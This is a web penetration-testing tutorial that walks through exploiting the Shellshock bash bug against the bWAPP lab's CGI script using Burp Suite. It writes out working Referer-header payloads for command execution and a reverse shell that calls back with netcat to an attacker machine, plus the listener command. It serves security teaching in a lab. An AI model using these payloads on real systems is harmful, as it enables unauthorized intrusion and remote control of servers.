Shellshock (also called Bashdoor, CVE-2014-6271) is a bug discovered in the Bash shell in September 2014 that allows the execution of arbitrary commands through function definitions stored in the values of environment variables.
Shellshock is relevant to us as web penetration testers because developers sometimes call system commands from PHP and CGI scripts (more commonly from CGI), and those scripts may make use of environment variables that the web server fills in from the request.
In this recipe, we will exploit a Shellshock vulnerability in the bee-box vulnerable virtual machine to gain command execution on the server.
In this recipe, the bWAPP application on bee-box is reached at http://192.168.56.103/bWAPP/
In the text, we can see something interesting: Current user: www-data. This may mean that the page is using a system call to get the username. It also gives us a hint: Attack the referrer.
We can see that there is an iframe calling a shell script, ./cgi-bin/shellshock.sh, which might be the script vulnerable to Shellshock.
To see the response from shellshock.sh, we first need to configure Burp Suite to intercept server responses. Go to Options in the Proxy tab and check the box labeled Intercept responses based on the following rules. With interception on, reload shellshock.php and forward the intercepted requests until we reach the one for ./bWAPP/cgi-bin/shellshock.sh. Then, replace the value of the Referer header with:
() { :;}; echo "Vulnerable:"
Forward the request, and any that follow it (for example, the request for a .ttf font file), and we should get the response from shellshock.sh, as shown:
The response now has a new header called Vulnerable. This is because the output of the echo command was integrated into the HTTP response headers, so we can take this further.
Now we can try to run a real command. Send the request again with the Referer set to:
() { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")
To obtain a reverse shell, we first start a listener on our Kali machine:
nc -vlp 12345
Back in Burp Suite, find the request to shellshock.sh, right-click on it and send it to Repeater, as illustrated. There, set the Referer to:
() { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345")
In this case, 192.168.56.1 is the address of our Kali machine.
In the first five steps, we discovered that there was a call to a shell script and, as it would have been run by a shell interpreter, that interpreter might be bash, possibly a vulnerable version of bash. To verify that, we performed the following test:
() { :;}; echo "Vulnerable:"
The first part, () { :;};, is an empty function definition. Bash can import functions from environment variables whose values start with () {, and this is the core of the vulnerability: a vulnerable bash keeps interpreting (and executing) whatever follows the closing brace of the function, which allows us to issue the second part, echo "Vulnerable:", a command that simply prints its arguments.
The vulnerability is reachable through the web server because the CGI implementation maps the request headers to environment variables of the script (the Referer header becomes HTTP_REFERER), so this attack also works if the payload is sent in User-Agent or Accept-Language instead of Referer.
Once we knew the server was vulnerable, we issued a test command, ifconfig, and then set up a reverse shell.
A reverse shell is a remote shell with the particular characteristic of being initiated by the victim computer: the attacker listens for a connection and the victim connects back, instead of the attacker connecting to a port opened on the victim as in a bind shell.
Once we have a shell on the server, we need to escalate privileges and gather the information needed for our penetration test.
Shellshock affected a huge number of servers and devices around the world, and there are many ways to exploit it. For example, the Metasploit Framework includes a module that sets up a rogue DHCP server to inject commands into the clients that connect to it (https://www.rapid7.com/db/modules/auxiliary/server/dhclient_bash_env); this is very useful in a network penetration test where mobile devices connect to the LAN.